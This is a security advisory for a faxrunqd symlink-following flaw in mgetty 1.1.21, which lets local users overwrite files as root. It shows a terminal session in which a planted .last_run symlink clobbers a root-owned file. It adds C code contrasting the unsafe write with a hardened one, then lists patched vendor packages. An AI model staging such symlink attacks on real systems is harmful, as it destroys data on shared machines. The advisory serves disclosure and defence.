COMMAND
mgetty
SYSTEMS AFFECTED
mgetty 1.1.21 and prior (at least back to 1994)
PROBLEM
Stan Bubrouski found the following. faxrunqd follows symbolic links
when creating certain files. The default location for the files
is /var/spool/fax/outgoing, which is a world-writable directory.
Local users can destroy the contents of any file on a mounted
filesystem because faxrunqd is usually run by root.
mgetty comes with a program named faxrunqd, which is a daemon to
send fax jobs queued by faxspool(1). Upon successful execution,
a file named .last_run is created in the /var/spool/fax/outgoing/
directory, which is world-writable. The problem is that faxrunqd
follows symlinks created by any user, so a file can be created
anywhere and existing files can be overwritten/destroyed.
Example:
Remote unprivileged user:
[user@king /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:46 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Smash me!!!
[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run -> /etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
Root console:
[root@king /tmp]# faxrunqd -l ttyS0
...
Remote unprivileged user:
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:48 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run -> /etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd
[user@king /tmp]$
Original report about this can be found at:
http://oliver.efri.hr/~crv/security/bugs/Linux/various.html
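Added example (not part of the original advisory and not mgetty's own code): C code showing the open-by-name write pattern described above next to a hardened version that refuses a symlink and verifies the opened file. The function names, the stamp text and the temporary directory under /tmp are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern the advisory describes: open by name, following any symlink. */
int write_stamp_unsafe(const char *path, const char *msg) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    int rc = write(fd, msg, strlen(msg)) < 0 ? -1 : 0;
    close(fd);
    return rc;
}

/* Hardened: no symlink as last component, then verify what was opened
 * (regular file, no extra hard links, owned by us) before truncating. */
int write_stamp_safe(const char *path, const char *msg) {
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;                     /* ELOOP if path is a symlink */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1 ||
        st.st_uid != geteuid() || ftruncate(fd, 0) < 0 ||
        write(fd, msg, strlen(msg)) < 0) { close(fd); return -1; }
    close(fd);
    return 0;
}

/* Constructed scenario: returns 1 if the victim file was overwritten, 0 if intact. */
int victim_overwritten(int (*writer)(const char *, const char *)) {
    char dir[] = "/tmp/spoolXXXXXX", victim[64], stamp[64], buf[32] = {0};
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/smash_me", dir);
    snprintf(stamp, sizeof stamp, "%s/.last_run", dir);
    if (write_stamp_unsafe(victim, "Smash me!!!\n") < 0) return -1; /* plain create */
    if (symlink(victim, stamp) < 0) return -1; /* the pre-planted .last_run link */
    writer(stamp, "stamp from daemon\n");
    FILE *f = fopen(victim, "r");
    if (!f) return -1;
    fgets(buf, sizeof buf, f); fclose(f);
    unlink(stamp); unlink(victim); rmdir(dir);
    return strcmp(buf, "Smash me!!!\n") != 0;
}

int main(void) {
    printf("unsafe: %d\n", victim_overwritten(write_stamp_unsafe));
    printf("safe:   %d\n", victim_overwritten(write_stamp_safe));
    return 0;
}
```

Keeping state files such as .last_run in a directory that only the daemon's user can write to removes the problem at its source; the checks above are the fallback when the directory must stay shared.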
SOLUTION
First of all, this hole does NOT exist anymore in 1.1.22. It has
been reported to me by the FreeBSD people, and closed on August
14, 2000. 1.1.22 has been released on August 17, 2000, and can
be found on the usual places (http://alpha.greenie.net/mgetty/).
If you are using the "sendfax" part of mgetty+sendfax AND you
have possibly-malicious users on your system, then you should
urgently upgrade to 1.1.22 (which should be a matter of "make;
make install").
Looks like someone else realized this at least a couple weeks ago.
$ make
===> mgetty-1.1.21 is marked as broken: insecure tempfile handling: can overwrite any file on the system.
The OpenBSD cvs log shows:
----------------------------
revision 1.17
date: 2000/08/15 19:38:18; author: brad; state: Exp; lines: +2 -2
even better reason why this should be marked BROKEN,
insecure tempfile handling: can overwrite any file on the system
----------------------------
For Caldera Systems:
- OpenLinux Desktop 2.3
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/mgetty-1.1.22_Aug17-2OL.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/SRPMS/mgetty-1.1.22_Aug17-2OL.src.rpm
- OpenLinux eServer 2.3 and OpenLinux eBuilder for ECential 3.0
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/mgetty-1.1.22_Aug17-2S.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS/SRPMS/mgetty-1.1.22_Aug17-2S.src.rpm
- OpenLinux eDesktop 2.4
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/mgetty-1.1.22_Aug17-2.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS/mgetty-1.1.22_Aug17-2.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mgetty-voice-1.1.22-1cl.i386.rpm
For Linux-Mandrake:
Linux-Mandrake 6.0: 6.0/RPMS/mgetty-1.1.22-2mdk.i586.rpm
6.0/RPMS/mgetty-contrib-1.1.22-2mdk.i586.rpm
6.0/RPMS/mgetty-sendfax-1.1.22-2mdk.i586.rpm
6.0/RPMS/mgetty-viewfax-1.1.22-2mdk.i586.rpm
6.0/RPMS/mgetty-voice-1.1.22-2mdk.i586.rpm
6.0/SRPMS/mgetty-1.1.22-2mdk.src.rpm
Linux-Mandrake 6.1: 6.1/RPMS/mgetty-1.1.22-2mdk.i586.rpm
6.1/RPMS/mgetty-contrib-1.1.22-2mdk.i586.rpm
6.1/RPMS/mgetty-sendfax-1.1.22-2mdk.i586.rpm
6.1/RPMS/mgetty-viewfax-1.1.22-2mdk.i586.rpm
6.1/RPMS/mgetty-voice-1.1.22-2mdk.i586.rpm
6.1/SRPMS/mgetty-1.1.22-2mdk.src.rpm
Linux-Mandrake 7.0: 7.0/RPMS/mgetty-1.1.22-2mdk.i586.rpm
7.0/RPMS/mgetty-contrib-1.1.22-2mdk.i586.rpm
7.0/RPMS/mgetty-sendfax-1.1.22-2mdk.i586.rpm
7.0/RPMS/mgetty-viewfax-1.1.22-2mdk.i586.rpm
7.0/RPMS/mgetty-voice-1.1.22-2mdk.i586.rpm
7.0/SRPMS/mgetty-1.1.22-2mdk.src.rpm
Linux-Mandrake 7.1: 7.1/RPMS/mgetty-1.1.22-2mdk.i586.rpm
7.1/RPMS/mgetty-contrib-1.1.22-2mdk.i586.rpm
7.1/RPMS/mgetty-sendfax-1.1.22-2mdk.i586.rpm
7.1/RPMS/mgetty-viewfax-1.1.22-2mdk.i586.rpm
7.1/RPMS/mgetty-voice-1.1.22-2mdk.i586.rpm
7.1/SRPMS/mgetty-1.1.22-2mdk.src.rpm
For RedHat:
ftp://updates.redhat.com/5.2/sparc/mgetty-voice-1.1.22-1.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/mgetty-viewfax-1.1.22-1.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/mgetty-sendfax-1.1.22-1.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/mgetty-1.1.22-1.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/alpha/mgetty-voice-1.1.22-1.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/mgetty-viewfax-1.1.22-1.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/mgetty-sendfax-1.1.22-1.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/mgetty-1.1.22-1.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/i386/mgetty-voice-1.1.22-1.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/mgetty-viewfax-1.1.22-1.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/mgetty-sendfax-1.1.22-1.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/mgetty-1.1.22-1.5.x.i386.rpm
ftp://updates.redhat.com/5.2/SRPMS/mgetty-1.1.22-1.5.x.src.rpm
ftp://updates.redhat.com/6.2/sparc/mgetty-voice-1.1.22-1.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/mgetty-viewfax-1.1.22-1.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/mgetty-sendfax-1.1.22-1.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/mgetty-1.1.22-1.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/i386/mgetty-voice-1.1.22-1.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/mgetty-viewfax-1.1.22-1.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/mgetty-sendfax-1.1.22-1.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/mgetty-1.1.22-1.6.x.i386.rpm
ftp://updates.redhat.com/6.2/alpha/mgetty-voice-1.1.22-1.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/mgetty-viewfax-1.1.22-1.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/mgetty-sendfax-1.1.22-1.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/mgetty-1.1.22-1.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/SRPMS/mgetty-1.1.22-1.6.x.src.rpm
For FreeBSD:
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/comms/mgetty-1.1.22.8.17.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/comms/mgetty-1.1.22.8.17.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/comms/mgetty-1.1.22.8.17.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/comms/mgetty-1.1.22.8.17.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/comms/mgetty-1.1.22.8.17.tgz